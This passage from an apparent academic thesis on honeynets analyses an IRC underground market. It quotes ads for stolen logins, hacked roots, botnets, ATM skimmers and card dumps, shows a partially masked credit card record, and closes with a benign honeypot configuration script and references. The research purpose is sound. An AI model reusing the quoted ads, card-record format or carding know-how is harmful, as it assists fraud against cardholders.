" Selling (...) ShopAdmins , Paypalz , Amazons ,(...) Accept WU !"
3
4
5
"( T ) rade for PayPal and some bank logins - (...) icq <xxx >"
" BUYING ALL VERFIED PAYPALS E - GOLD / WEST UNION "
Listing 5.15: Sample Advertisements and Requests for Bank Logins and Online Accounts
5.4.2.4 Hacking-Related Offers and Requests
In almost one out of 7 messages of the sample data, adversaries offered hacked hosts for
sale. These hosts may, for instance, serve as intermediaries for further attacks or to make
tracing more difficult (cmp. Honeynet Project, 2004c). As indicated in Listing 5.16,
blackhats periodically advertise larger numbers of penetrated systems in the form of
botnets as well. In dependence of its size, a botnet may potentially cause severe havoc,
e.g., when bringing down the network of a business competitor during a Distributed
Denial of Service (DDos) attack (see Provos and Holz, 2007; Mirkovic and Reiher, 2004).
Compromised machines may also be used for spamming or phishing campaigns. In
the latter case, an attacker first sets up a so-called scam page that mimics the web
140
1
2
"( S ) elling hacked roots : linux , freeBSD , sunOS ; hacked shells (...) "
" Selling botnets / bots For Reasonable Prices .. / msg for Instant deals "
3
4
5
" I want to buy root ‘ s or remote desktop msg me payment via e - gold "
" NEED REMOTE FROM USA - ADMINISTRATOR -> TRADE FOR ROOT URGENT !"
6
7
8
" I can host scampages ... / q < Nick > for details "
" Selling Fresh 5 Million Email List For Spamming "
9
10
11
" I need Scam Page Designer !! Msg me now !!"
" I am looking for a Spammer to be parteners !!!!"
Listing 5.16: Sample Advertisements and Requests for Hacked Hosts
site of a legitimate, trusted service provider. In the next step, unaware computer users
are lured into visiting the fraudulent page, typically by sending specially crafted email
messages (cmp Watson et al., 2005). The victims are then tricked into entering their
online credentials or other sensitive information that are particularly interesting for
Internet miscreants. In 8.75% of the samples, adversaries explicitly advertised these
types of services, 9.5% of the labeled data contained spam-related offers. Except for
spamming operations, corresponding requests were practically negligible. A number of
selected messages that we have obtained in the channel are presented in the lower half
of Listing 5.16.
5.4.2.5 Personal Information-Related Offers and Requests
In addition to credit card-related information, adversaries frequently advertised so-called
fulls, i.e., personal data that included the full address of the cardholder, her phone
number as well as her email address. Sample records as the one shown in Listing 5.17
were periodically posted to the channel, possibly as a proof of possession or to stimulate
demand. On the other hand, we measured corresponding requests in less than 1% of the
labeled data, even though these pieces of information may facilitate any kind of identity
theft (cmp. also McCarty, 2003). An overview about typical messages that we have
captured during the observation period is given in Listing 5.18.
141
1
2
3
4
5
6
7
8
9
10
Credit Card Number :
CVV :
Expiry Date :
Name :
Address :
ZIP :
State :
Country :
Phone Number :
Email Address :
52 xxxx1733xxxx3x
761
06/10
Eurie <... >
<... > Ave Apt 3
<... >
Texas
United States
<... >
<... > @msn . com
Listing 5.17: Example of a Full Personal Record
1
2
" Sell Fresh Full Info & Cvv2 ( AU , CA , UK , US , IT , SP , EU ) (...) "
" SELLING CANADIAN ID ’S , Be anyone you WANT ! Great for WU Pickups (...) "
3
4
" Need Valid US Cvv2 & Full info (...) Msg . me Ready to Deal A . S . A . P !!!"
Listing 5.18: Sample Advertisements and Requests for Personal Data
5.4.2.6 Equipment-Related Offers and Requests
The hardware equipment which is needed to retrieve credit card-related information was
also offered for sale in the communication channel we have monitored. In particular,
blackhats advertised so-called skimmers as well as cameras for automated teller machines (ATMs) to secretly record the PIN and the respective carding data when a victim
withdraws money from her account. The latter may then be processed by a MSR-206
magnetic card writer that creates a new, valid duplicate. Prices for such devices varied
between $400 and $600 in the channel.
Two typical product advertisements and a request that we have been confronted with
are shown in Listing 5.19.
1
2
" Selling ATM SKIMMER + MSR206 with 5 blank magnetic cards (...) "
" ATM Skimmers , Cameras , MSR206 , Readers , etc . for sale (...) "
3
4
" LOOKING FOR MSR 206 / MSG FOR MORE INFO ."
Listing 5.19: Sample Advertisements and Requests for Hardware Equipment
5.4.3 Classification of the Entire Text Corpora
As we have outlined, with the help of the manually labeled data, we were able to classify
more than four fifth of the entire text corpora. In order to assess the remaining messages
that we have captured in the channel during the observation period, we use statistical
machine learning techniques that automatically associate each post with a meaningful
142
Figure 5.30: Process of a Machine Learning-Based Text Classification
descriptor. Thereby, we are able to split the text corpora into different message categories
and can roughly estimate the number of advertisements for hacking-related goods and
services, corresponding requests, and other types of posts. Examples for the latter case
are, e.g., recorded conversations between two adversaries that may or may not be directly
related to the underground economy.
Machine learning-based text classifications have already proven useful in the past for
analyzing monitored IRC communications (see Franklin and Paxson, 2007; Elnahrawy,
2002; Mazzariello, 2008). Generally, the classification process is twofold (cmp. Sebastiani, 2002; Manning et al., 2008): In the first step, various example documents are
passed as training data to a classification software. The training data are required to
“learn” the prevailing characteristics of the categories of interest and build an apposite
statistical model. On the basis of this model, new, unknown documents may then be
properly classified in the second step. An overview about the operations is given in
Figure 5.30.
143
Category
Advertisements for Hacking-Related
Goods and Services
Requests for Hacking-Related Goods
and Services
Other Types of Posts
Precision Value
Recall Value
92.13%
75.73%
82.13%
73.28%
54.71%
90.80%
Table 5.10: Average Precision and Recall Values of the Training Data
For our purposes, we run the statistical classification software rainbow that was developed by Andrew McCallum41 . It implements several different classification algorithms
and approaches, e.g., the probabilistic Naive Bayes approach which is chosen by default
and is considered to be “one of the most efficient and effective inductive learning algorithms for machine learning” (see Zhang, 2004). Alternatively, example-based classifiers
such as the k-nearest neighbor (KNN) or linear support vector machines (SVMs) may
be applied for the text classification task as well. The latter are described in detail by
Joachims (2002) but are not taken into consideration in our case.
Regarding the first, learning-oriented phase, we train the rainbow package with a
number of pre-selected example messages for each of our categories. We then check the
robustness of the generated model in 5 test trials: In each trial, we randomly select 20%
of the training data for testing and calculate both the precision and recall values. The
precision and recall values determine the effectiveness of a classification operation and
are defined as (cmp. Sebastiani, 2002):
Precision =
Recall =
Number of Correct Positives
Number of Predicted Positives
(5.1)
Number of Correct Positives
Number of Actual Positives
(5.2)
The final scores for the different categories after the five test trials are listed in Table 5.10. As can be seen, both the randomly selected example advertisements as well
as the corresponding requests are classified quite well. On the contrary, chat-related
types of messages, unfortunately, only attain a mediocre precision that is likely caused
by a lack of good sample data. Since our research focus is set on the first two categories, however, our model appears to be sufficiently robust to categorize the entire text
corpora.
To effectively carry out the classification task, we develop a simple client for the rainbow package that passes the 676.084 messages, one at a time, to the software. With the
help of the client, we are able to complete the categorization within a short amount of
41
see http://www.cs.cmu.edu/~mccallum/bow/rainbow/
144
Figure 5.31: Estimated Distribution of Offers and Requests in the Text Corpora
time. The results of the operation are illustrated in Figure 5.31: We estimate more than
95% of all captured messages either offer or request hacking-related goods and services,
while offers outnumber requests more than 5 to 1. In turn, conversations between adversaries and other, non-categorized types of posts approximately cover solely 4.8% of
the text corpora and, thus, only play a minor role in an analysis of the communication
channel.
5.4.4 Noticeable Characteristics of the Underground Market
In the remainder of this section, we briefly illustrate various characteristics that we
find are noticeable for the underground market we have observed. First, the market is
affected by a high fluctuation: 64.54% of 1.345 unique nicks we have measured during
the observation period have stayed only for one day on the channel. Furthermore, as
indicated by the cumulative distribution function displayed in Figure 5.32, in more than
95% of all cases, the active lifetime of a nick was less than a week, and solely a small
core of 36 nicks remained active for 10 days or more.42
Possible reasons for this distribution may be among the following but still need to be
researched more closely in the future:
• A large group of users either complete their transactions within a short amount
of time, or they quickly leave the channel because their expectations are not sufficiently met, alternative channels are more promising, or due to a general lack of
real interest in the underground economy.
42
The active lifetime of a nick indicates the total number of days, a nick has actively participated in
the underground market and has posted at least one message to the channel per day.
145
Figure 5.32: Active Lifetime of Nicks in the Communication Channel
• A small number of users appear to be seriously intrigued with the market activities.
These core users presumably show a high involvement in the underground economy,
strive for strong (business) relationships with other Internet miscreants, and seek
to maximize their profit margins in the long term (see also Franklin and Paxson,
2007).
Apart from the high fluctuation, other prevailing characteristics of the underground
market are a high level of uncertainty and, as Franklin and Paxson (2007) term it, a “culture of dishonesty and distrust”: Many participants appear to be constantly concerned
of “getting ripped”, i.e., falling prey to a defraud as the extracts shown in Listing 5.20
suggest.
1
2
3
" HAVE VIRGIN USA SKIMMED DUMPS FOR SHOPPING (...)
RIPPERS DON ’ T WASTE MY TIME !
CONTACT ME ONLY IF YOU ’ RE FOR REAL ."
4
5
6
" CASHING CANADIAN DUMPS , 50/50 Share ,
No Rippers ! Serious People Only !"
7
8
9
10
" Selling EU dumps with pin [ track1 / track2 ] (...)
NO KIDS , NO TESTS , NO RIPPERS ....
IF YOU WASTE MY TIME I WILL IGNORE YOU !!! (...) "
Listing 5.20: Sample Messages Indicating Distrust in Other Market Participants
146
In case a fraudulent operation is detected, the victim usually posts a warning message
for other users to the channel, and the “ripper” is excluded from the market. Similar
observations are also reported by Thomas and Martin (2006). As pointed out by Franklin
and Paxson (2007, p. 13), however, these warning mechanisms may also be used against
the underground community to see a “marked decrease in the number of successful
transactions”: In a so-called slander attack, the status of honest sellers is systematically
eliminated using false defamation. The authors argue that quality sellers are thus driven
out of the market as they increasingly lose their customer base and are unable to maintain
their price level (cmp. also Akerlof, 1970). In the long term, a lemon market situation is
created, buyers cannot reliably distinguish the quality of goods and services any longer,
and the respective economy eventually collapses. As Franklin and Paxson (2007, p. 13)
conclude, this is “a desired outcome”.
5.5 Summary
In this chapter, we have outlined the implementation, deployment, and analysis process
for a honeynet setup with three electronic baits. Our decoys were based on both Microsoft Windows and Linux operating systems. We have installed various services and
applications that were intentionally configured insecurely or contained well-known vulnerabilities. To mitigate risks for external third parties as best as possible in case of an
intrusion, we have deployed the Honeywall, an observation and filtering gateway device
that is capable of controlling traffic going to or coming from the individual honeypots.
We have also introduced several tools and applications that greatly support security
professionals when capturing and analyzing malicious activities.
In the course of the thesis, we have witnessed a large number of penetration attempts
from all over the world. We gave a brief overview about the collected data and illustrated
typical threats and attack patterns. Two system compromises were presented in detail.
We have examined the tools and tactics of the different intruders and developed basic
profiles to determine their motives more accurately. We were also able to monitor a
communication channel that was extensively used by adversaries. The results of these
observations helped gain an insight in the hacking community and reveal some kind of
underground economy.
147
In the previous chapters, we have presented concepts and applications of current honeypot and honeynet technologies. A honeypot, as “an information system resource whose
value lies in unauthorized or illicit use of that resource” (see Spitzner, 2003a), implements specific features such as a number of known security weaknesses that make it
particularly appealing to adversaries. It serves as an electronic bait and helps security professionals collect extensive information about intruders. When multiple decoys
are grouped into a honeynet, malicious activities can be even watched across an entire
network segment. With the bootable Live CD we have developed in the course of this
thesis, such a honeynet may be deployed within a short amount of time. The CD is
completely executed in memory and sets up an instance of the nepenthes honeypot in
a secured environment. Nepenthes emulates various vulnerabilities that are frequently
exploited by common types of self spreading malware and permits capturing worms and
computer viruses on a large scale. Thereby, we are able to efficiently assess the level of
threat on the Internet.
In the second part of this thesis, we have watched human attackers within a honeynet
of three decoys running Microsoft Windows- and Linux-based operating systems. These
machines were constantly probed throughout the observation period. Two of the attacks
were particularly interesting: In one case, an adversary compromised a misconfigured
database management program and started uploading copyright-protected media. In a
different attack, a black hat connected to several underground communication channels
after our system had been penetrated. We were able to monitor these channels using
utilities that were published by the Honeynet Project. After investigating the recorded
text messages, we found evidence for a vivid trade of stolen credit card numbers and
other confidential data.
In summary, honeypots and honeynets offer a systematic approach to come to a deeper
understanding of adversaries and learn more about their tools, tactics, and motives. By
watching the steps of intruders, we are able to collect empirical data and shed light on an
Internet community which is frequently misunderstood and misperceived (cmp. Rogers,
2000a; Fötinger and Ziegler, 2004). These pro-active measures complement traditional,
more defense-oriented fields of IT security. Furthermore, as electronic baits evolve and
get more sophisticated, attackers will possibly be forced to react and start developing
countermeasures in order to evade detection. Basic techniques have already been described by Corey (2003) and Corey (2004), other approaches have been demonstrated
by Dornseif et al. (2004a) and Holz and Raynal (2005b) (cmp. Chapter 2). As Lance
Spitzner points out, this is “a good indication that this technology has started to make
148
a difference; (...) We are now making the attackers react to us; it’s one of the few ways
we can take the initiative back” (see Honeynet Project, 2004b, p. 683).
However, it is also important to note that honeynet research suffers from specific
inherent problems and faces certain limitations at the time of this writing. First, some
of the major monitoring tools are still quite immature. For example, the Sebek keystroke
logging utility turned out to be incompatible with recent versions of Microsoft Windows
operating systems and caused regular system crashes. Furthermore, some data capture
components of the Honeywall periodically stopped working1 and led to inconsistent
data sources. The latter types of flaws were usually quickly fixed by participants of the
Honeynet Project though.
In addition, there appears to be a tendency honeynet setups mostly attract automated
attacks and low-skilled intruders (see Honeynet Project, 2004b). In the course of our
thesis, we have not witnessed any advanced or even new threats. Unfortunately, we
did not see any system compromises due to exploit code either. On the other hand,
many attackers initiated connections over encrypted communication channels whenever
possible. Similar findings are reported by other security professionals as well (cmp.
Honeynet Project, 2004b, p. 39, 58-59). Therefore, data capture as well as data analysis
applications must be adapted to keep up with adversaries in the future. Last but not
least, legal implications of honeynet architectures have not been sufficiently evaluated
yet. For instance, luring a black hat into a trap may fall in the scope of specific privacyand entrapment-related acts (cmp. Spitzner, 2003d). To the best knowledge of the
author, existing literature is focused on US law to date. Thus, deploying electronic baits
in other countries remains a twilight zone.
Taking the different aspects into consideration, we find several areas of interest that
are worth studying in more detail. These opportunities for future research are briefly
illustrated below.
Opportunities for Future Research
In this thesis, we have concentrated on capturing and analyzing server-related malicious activities. This approach is effective to estimate the level of threat for common
systems and services deployed on the Internet today. On the other hand, Provos and Holz
(2007) point out, there was a growing trend for attackers exploiting security weaknesses
in typical user applications such as web browsers or email programs. For this reason,
many authors suggest developing client-side honeypots and actively scan web sites, chat
rooms, and peer-to-peer (P2P) networks for malicious content (see Seifert et al., 2006;
Danford, 2006; Ikinci et al., 2008). These types of honeypots are possibly also capable
of capturing 0-day exploits and other new attack techniques that are unknown to the
security community to date (cmp. Feinstein and Peck, 2007). Preliminary findings in
this area are promising (see Wang et al., 2005).
1
Note: For more information, please see the discussion on the mailing list of the Honeynet Project,
https://public.honeynet.org/mailman/listinfo
149
In addition, as members of the Honeynet Project (2004b) state, almost all honeynets
are set up on external networks. Thus, there is lack of empirical data regarding attacks by insiders, even though this group may cause severe havoc, particularly in a
business-oriented environment (cmp. Rogers, 2005). Technically sophisticated production honeypots may help reveal malevolent behavior within organizations and cope with
these risks.
Furthermore, Lance Spitzner argues, “most honeynets have been stand-alone deployments, giving you an isolated picture of threat activity” (see Honeynet Project, 2004b,
p. 680). As we have explained in Chapter 3, distributed honeynets may solve these issues,
because data are acquired from multiple sources. However, publicly available research
results in this field are quite limited at the time of this writing (see Watson, 2007) and
still need to be assessed in more detail in the future.
Last but not least, we feel psychological aspects in computer crime are still inadequately covered in the literature, even though, according to Max Kilger, “an understanding of the blackhat community is equally as important as an understanding of the
technical tools used to discover their exploits” (see Honeynet Project, 2004b, p. 506).
In recent years, various authors have attempted to develop statistically valid models of
adversaries (cmp. Rogers, 2000a, 2005; Chantler, 1995; Woo, 2003; Fötinger and Ziegler,
2004). If we succeed in observing more advanced and sophisticated attackers, honeynets
may well contribute to these activities.
150
A Configuration Script for the
Nepenthes Honeypot
The behavior and appearance of the nepenthes low-interaction honeypot may be quickly
and comfortably adapted with the graphical configuration interface that is implemented
on the Live CD (see Section 4.3.3.2). The interface is technically based on a custom
shell script which makes ample use of the dialog package by Vincent Stemen as well as
the awk and sed text processing utilities.
In the following listing, an extract of the shell script is shown. The main configuration file nepenthes.conf is read in, and the list of nepenthes vulnerability modules is
extracted with the help of specially crafted regular expressions (cmp. Lines 12 to 20).
This list is displayed in a new module selection window in the next step as indicated in
Lines 24 to 27 of Listing A.1. By clicking on a certain item, the user may then interactively enable or disable the respective component of the honeypot. After all changes
have been made, the program settings are updated and come into effect once the decoy
is restarted (see Lines 32 to 66).
1
#! / b i n / s h
2
3
4
tempfile = ‘ tempfile 2 >/ dev / null ‘ || tempfile =/ tmp / conf$$
trap " rm -f $tempfile " 0 1 2 5 15
5
6
7
8
# name o f t h e n e p e n t h e s main c o n f i g u r a t i o n f i l e
N E P E N T H E S _ C O N F I G _ F I L E = " (...) / etc / nepenthes / nepenthes . conf "
...
9
10
11
12
13
# read in the nepenthes c o n f i g u r a t i o n
# th e v u l n e r a b i l i t y modules
awk ’/ vuln .*\. so /{
total += 1;
f i l e , and e x t r a c t t h e names o f
14
15
16
17
18
19
20
# c h e c k i f t h e module i s d i s a b l e d , i . e . , i s commented o u t
if ( $1 ~/\/\//)
print $2 " " total " off \ n " ;
else
print $2 " " total " on \ n "
} ’ $ N E P E N T H E S _ C O N F I G _ F I L E > $tempfile
21
22
data = ‘ cat $tempfile ‘
151
A Configuration Script for the Nepenthes Honeypot
23
24
25
26
27
# d i s p l a y t h e module s e l e c t i o n window
_vuln = $ (/ usr / bin / dialog -- stdout -- clear \
-- backtitle " (...) " -- title " Configure Vulnerability Modules " \
-- checklist " \ nPlease select the vulnerability modules you would like
to enable at startup .\ n " 0 0 10 $data )
28
29
...
30
31
32
33
34
35
36
37
38
39
# s a v e t h e new s y s t e m s e t t i n g s
awk ’ BEGIN {
# g e t t h e names o f t h e s e l e c t e d m o d u l e s
for ( x =1; x < ARGC -2; x ++) {
vuln [x -1]= ARGV [ x ];
delete ARGV [ x ]
}
}/ vuln .*\. so /{
found =0
40
41
42
43
44
# a c t i v a t e t h e s e l e c t e d modules in t h e c o n f i g u r a t i o n
for ( module in vuln ) {
if ( $0 ~ vuln [ module ]) {
found =1;
file
45
# t o a c t i v a t e a s p e c i f i c module i n t h e c o n f i g u r a t i o n f i l e ,
# p r i o r l y e x i s t i n g comment c h a r a c t e r s must b e removed
if (( $0 ~/\/\//) ) {
...
sub ( " // " ," " , $0 )
46
47
48
49
50
51
# update the c o n f i g u r a t i o n f i l e
system ( " sed -e s \47/ " config_entry " / " $0 " /\47 " ARGV [ ARGC -1] " >
" ARGV [ ARGC -2] " && cp " ARGV [ ARGC -2] " " ARGV [ ARGC -1])
52
53
54
}
break
55
56
}
57
58
}
59
60
61
62
63
64
65
66
# t o d e a c t i v a t e a s p e c i f i c module i n t h e c o n f i g u r a t i o n f i l e ,
# t h e r e s p e c t i v e e n t r y must b e commented o u t
if (( found ==0) && (!( $0 ~/\/\//) ) ) {
system ( " sed -e s \47/ " $0 " /\\/\\/ " $0 " /\47 " ARGV [ ARGC -1] " >
" ARGV [ ARGC -2] " && cp " ARGV [ ARGC -2] " " ARGV [ ARGC -1])
}
} ’ $_vuln $tempfile $ N E P E N T H E S _ C O N F I G _ F I L E
Listing A.1: Extract of the Configuration Script for the nepenthes Honeypot
152
When the Live CD is launched, the user may invoke the Isolinux boot loader with
different boot options (see Section 4.3.3.4). These options are passed to the system
kernel in order to change specific, runtime-related aspects of the operating system. For
instance, it is possible to disable certain hardware devices or adapt the default video
mode. Such customizations are particularly useful in case the machine stalls or even
unexpectedly crashes during the startup phase.
A brief description of the most important boot options is shown in Table B.1, a more
detailed reference is available from the Linux Kernel Organization (2009). To take effect,
the individual options must be added to the APPEND section of the respective boot label.
Boot Option
vga=<...>
acpi=off
nohotplug
nopcmcia
noagp
nodma
noauto
nohd
nocd
from=<...>
root=<...>
Description
Changes the default video mode. Thereby, the CD can be
run on systems with limited screen resolution capabilities. In
order to switch to another mode, a so-called VESA (Video
Electronics Standards Association) mode number must be entered. An overview about valid mode numbers is given by
Knorr (2009).
Disables specific autodetection routines for hardware devices,
e.g., memory or video cards. This option is recommended in
case the system stalls during the boot process.
Disables the Direct Memory Access (DMA) mode for hardware
devices.
Hardware drives such as disks or CD-ROM drives are not
automatically mounted during the boot process. In order to
access a specific disk or drive, it has to be manually mounted
during runtime.
Loads the Live CD from a specific drive or path. For example,
the option from=/dev/hda1 invokes the CD from the first
hard drive.
Specifies the root device. In the case of the Live CD, the initial
ram disk /dev/ram0 is mounted as root (see also Almesberger
and Lermen, 2000).
153
Boot Option
passwd=<...>
changes=<...>
toram
copy2ram
ramdisk_size=<...>
load=module
debug
autoexec=<...>
Description
Sets the system password for the root superuser account to
a specific string. In case the option is set to passwd=ask,
the user is prompted to set a new password during the boot
process.
Changes made at runtime are persistently stored to a specific file or drive. Thereby, no data are lost if the system is
shutdown or rebooted.
All files are copied to memory. Although this may consume
large portions of space and slow down the boot process,
operations at runtime may be significantly accelerated.
Sets the size of the initial ram disk which serves as a temporary root file system during the boot process of the operating
system. The default size of the disk is 4096 kB (see Gortmaker, 2004).
Loads a specific file system module when booting the CD.
In case the noload=<module> option is set, a certain module
may be excluded from the boot process.
Enables the debug mode during the boot process and reports
the status of specific internal operations.
Executes a pre-defined command instead of displaying the
default login manager. For instance, to automatically invoke
the XWindow system and skip the authentication procedure,
the option must be set to autoexec=startx.
Table B.1: Important Boot Options of the Live CD
(Source: Based on Matejicek, 2008a; Linux Kernel Organization, 2009)
154
References
[Ajzen 1991] Ajzen, Icek: The Theory of Planned Behavior. In: Organizational Behavior
and Human Decision Processes 2 (1991), No. 50, p. 179–211
[Akerlof 1970] Akerlof, George A.: The Market for “Lemons”: Quality Uncertainty
and the Market Mechanism. In: The Quarterly Journal of Economics 84 (1970), No. 3,
p. 488–500
[Aleph One 1996] Aleph One: Smashing the Stack for Fun and Profit. In: Phrack
Magazine 49 (1996), No. 14
[Almesberger and Lermen 2000] Almesberger, Werner ; Lermen, Hans: Using
the Initial RAM Disk (initrd). Published: 2000. http://www.kernel.org/doc/
Documentation/initrd.txt, Retrieved: August 11, 2009
[Andrews and Whittaker 2006] Andrews, Mike ; Whittaker, James A.:
Break Web Software. Addison Wesley, 2006
How to
[Antonomasia 2003] Antonomasia: Additional Logging for Honeypots. Published:
2003. http://www.notatla.org.uk/SOFTWARE/honeypot_code_description.html,
Retrieved: August 11, 2009
[Bächer et al. 2008] Bächer, Paul ; Holz, Thorsten ; Kötter, Markus ; Wicherski,
Georg: Know your Enemy: Tracking Botnets. Published: October 2008. http:
//honeynet.org/papers/bots/, Retrieved: August 11, 2009
[Bächer et al. 2006] Bächer, Paul ; Kötter, Markus ; Holz, Thorsten ; Dornseif,
Maximillian ; Freiling, Felix: The Nepenthes Platform: An Efficient Approach to
Collect Malware. In: 9th International Symposium on Recent Advances in Intrusion
Detection, 2006
[Balas and Viecco 2005] Balas, Edward ; Viecco, Cimo: Towards a Third Generation Data Capture Architecture for Honeynets. In: Proceedings of the 6th IEEE
Information Assurance Workshop, 2005, p. 21–28
[Baldwin 2002a] Baldwin, Lawrence: Pubstro Forensics. Published: September
2002.
http://www.mynetwatchman.com/kb/security/articles/winforensics/
index.htm, Retrieved: August 11, 2009
155
References
[Baldwin 2002b] Baldwin, Lawrence ; myNetWatchman (Editor): Windows Messenger Delivery Options: SMB vs. MS RPC. Published: November 2002. http:
//www.mynetwatchman.com/kb/security/articles/popupspam/netsend.htm, Retrieved: August 11, 2009
[Baldwin 2003] Baldwin, Lawrence:
myNetWatchman Alert - Windows PopUP
SPAM.
Published: September 2003.
http://www.mynetwatchman.com/kb/
security/articles/popupspam/, Retrieved: August 11, 2009
[Barford et al. 2002] Barford, Paul ; Kline, Jeffery ; Plonka, David ; Ron, Amos:
A Signal Analysis of Network Traffic Anomalies. In: Proceedings of the 2nd ACM
SIGCOMM Workshop on Internet Measurement, 2002
[Bastian 2004] Bastian, Waldo: The KDE User Guide. Published: June 2004. http:
//docs.kde.org/development/en/kdebase-runtime/userguide/index.html, Retrieved: August 11, 2009
[Bauer 2001] Bauer, Mick: Swatch: Automated Log Monitoring for the Vigilant
but Lazy. Published: 2001. http://www.linuxjournal.com/article/4776, Retrieved: August 11, 2009
[Bernstein 1996] Bernstein, Daniel J.: SYN Cookies. Published: 1996. http://cr.
yp.to/syncookies.html, Retrieved: August 11, 2009
[Bernstein 2005] Bernstein, Daniel J.: Cache-Timing Attacks on AES. Published:
2005. http://cr.yp.to/antiforgery/cachetiming-20050414.pdf, Retrieved: August 11, 2009
[Brand 2007] Brand, Nicholas: The LiveCD List. Published: 2007. http://www.
livecdlist.com/, Retrieved: August 11, 2009
[Brockmeier 2001] Brockmeier, Joe ; IBM DeveloperWorks (Editor): Slackware Linux 101 - A Look at what Happens when You Boot Your Linux Box.
Published: March 2001. http://www.ibm.com/developerworks/linux/library/
l-slack.html, Retrieved: August 11, 2009
[Brohan 2009] Brohan, Mark: The Top 500 Guide. Published: June 2009. http:
//www.internetretailer.com/article.asp?id=30594, Retrieved: August 11, 2009
[Brownlee et al. 1997] Brownlee, Nevil ; Mills, Carl ; Ruth, Gregory R.: RFC: 2063
- Traffic Flow Measurement: Architecture. Published: 1997. http://www.ietf.org/
rfc/rfc2063.txt, Retrieved: August 11, 2009
[Buddenhagen 2007] Buddenhagen, Oswald: The KDM Handbook. Published:
Dezember 2007.
http://docs.kde.org/kde3/en/kdebase/kdm/kdm.pdf, Retrieved: August 11, 2009
156
References
[Burr 2002] Burr, Simon:
How to Break Out of a Chroot() Jail.
Published: 2002. http://www.bpfh.net/simes/computing/chroot-break.html,
[Cameron 2003] Cameron, Jamie: Managing Linux Systems with Webmin - System
Administration and Module Development. Addison Wesley, 2003
[Capgemini 2008] Capgemini (Editor):
Studie IT-Trends 2008 (German).
Published: 2008. http://www.at.capgemini.com/m/at/tl/IT-Trends_2008.pdf,
[Carrier 2006] Carrier, Brian D.: Risks of Live Digital Forensic Analysis. In: Communications of the ACM 49 (2006), No. 2, p. 56–61
[Caswell et al. 2007] Caswell, Brian ; Beale, Jay ; Baker, Andrew: Snort Intrusion
Detection and Prevention Toolkit. Syngress Publishing, 2007
[CERT 1996] CERT (Editor): Advisory CA-1996-21 TCP SYN Flooding and IP Spoofing Attacks. Published: 1996. http://www.cert.org/advisories/CA-1996-21.
html, Retrieved: August 11, 2009
[CERT 1998] CERT (Editor): Advisory CA-1998-12 Remotely Exploitable Buffer Overflow Vulnerability in mountd. Published: 1998. http://www.cert.org/advisories/
CA-1998-12.html, Retrieved: August 11, 2009
[CERT 2001a] CERT (Editor): Advisory CA-2001-19 “Code Red” Worm Exploiting
Buffer Overflow In IIS Indexing Service DLL. Published: 2001. http://www.cert.
org/advisories/CA-2001-19.html, Retrieved: August 11, 2009
[CERT 2001b] CERT (Editor): Advisory CA-2001-23 Continued Threat of the “Code
Red” Worm. Published: 2001. http://www.cert.org/advisories/CA-2001-23.
[CERT 2001c] CERT (Editor): Denial of Service Attacks. Published: June 2001. http:
//www.cert.org/tech_tips/denial_of_service.html, Retrieved: August 11, 2009
[CERT 2003a] CERT (Editor):
Advisory CA-2003-04 MS-SQL Server Worm.
Published: January 2003. http://www.cert.org/advisories/CA-2003-04.html,
[CERT 2003b] CERT (Editor): Advisory CA-2003-24 Buffer Management Vulnerability
in OpenSSH. Published: 2003. http://www.cert.org/advisories/CA-2003-24.
157
References
[CERT 2004] CERT (Editor): Computer Emergency Response Team: Vulnerability
Note VU 497400. Published: November 2004. http://www.kb.cert.org/vuls/id/
497400, Retrieved: August 11, 2009
[CERT 2009] CERT (Editor): CERT Statistics. Published: February 2009. http:
//www.cert.org/stats/, Retrieved: August 11, 2009
[Chang 2002] Chang, Rocky K. C.: Defending against Flooding-Based Distributed
Denial-of-Service Attacks: A Tutorial. In: IEEE Communications Magazine 40
(2002), No. 10, p. 42–51
[Chantler 1995] Chantler, Alan N.: Risk: The Profile of the Computer Hacker, School
of Information Systems, Curtin Business School, (PHD Thesis), 1995
[Chiesa et al. 2009] Chiesa, Raoul ; Ciappi, Silvio ; (Autor), Stefania D.: Profiling
Hackers - The Science of Criminal Profiling as Applied to the World of Hacking.
Taylor & Francis Group, 2009
[Chung et al. 1995] Chung, Mandy ; Puketza, Nicholas ; Olsson, Ronald A. ;
Mukherjee, Biswanath: Simulating Concurrent Intrusions for Testing Intrusion
Detection Systems: Parallelizing Intrusions. In: Proceedings of the 1995 National
Information Systems Security Conference, 1995
[Comer 2000] Comer, Douglas E.: Internetworking with TCP/IP: Principles, Protocols,
and Architecture. 4th Edition. Prentice Hall, 2000
[Corey 2003] Corey, Joseph: Local Honeypot Identification. Published: 2003. http:
//www.ouah.org/p62-0x07.txt, Retrieved: August 11, 2009
[Corey 2004] Corey, Joseph: Advanced Honeypot Identification and Exploitation.
Published: 2004. http://www.ouah.org/p63-0x09.txt, Retrieved: August 11, 2009
[Craig and Burnett 2005] Craig, Paul ; Burnett, Mark: Software Piracy Exposed.
Syngress Publishing, 2005
[Creasy 1981] Creasy, Robert J.: The Origin of the VM/370 Time-Sharing System.
In: IBM Journal of Research and Development 25 (1981), No. 5, p. 483–490
[Criscuolo 2000] Criscuolo, Paul J.:
Distributed Denial of Service.
Published: February 2000.
http://www.itsec.gov.cn/webportal/download/
2000-CIAC-2319_Distributed_Denial_of_Service.pdf,
Retrieved:
August 11, 2009
[Cross and Shinder 2008] Cross, Michael ; Shinder, Debra L.: Scene of the Cybercrime.
2nd Edition. Syngress Publishing, 2008
158
References
[Curran et al. 2005] Curran, Kevin ; Morrissey, Colman ; Fafan, Colm ; Murphy,
Colm ; O’Donnell, Brian ; Fitzpatrick, Gerry ; Condit, Stephen: Monitoring
Hacker Activity with a Honeynet. In: International Journal of Network Management
(2005), p. 123–134
[CVE 2003] CVE (Editor): CVE-2003-0466. Published: 2003. http://secunia.com/
advisories/cve_reference/CVE-2003-0466/, Retrieved: August 11, 2009
[CVE 2005] CVE (Editor): CVE-2005-0200. Published: 2005. http://cve.mitre.
org/cgi-bin/cvename.cgi?name=CVE-2005-0200, Retrieved: August 11, 2009
[CVE 2006a] CVE (Editor): CVE-2006-3392. Published: 2006. http://cve.mitre.
org/cgi-bin/cvename.cgi?name=CVE-2006-3392, Retrieved: August 11, 2009
[CVE 2006b] CVE (Editor): CVE-2006-6912. Published: 2006. http://secunia.
com/advisories/cve_reference/CVE-2006-6912/, Retrieved: August 11, 2009
[Dalheimer and Welsh 2005] Dalheimer, Matthias K. ; Welsh, Matt: Running Linux.
O’Reilly, 2005
[Danford 2006] Danford, Robert:
2nd Generation Honeyclients.
Published:
2006.
http://handlers.dshield.org/rdanford/pub/Honeyclients_Danford_
SANSfire06.pdf, Retrieved: Apr 22, 2009
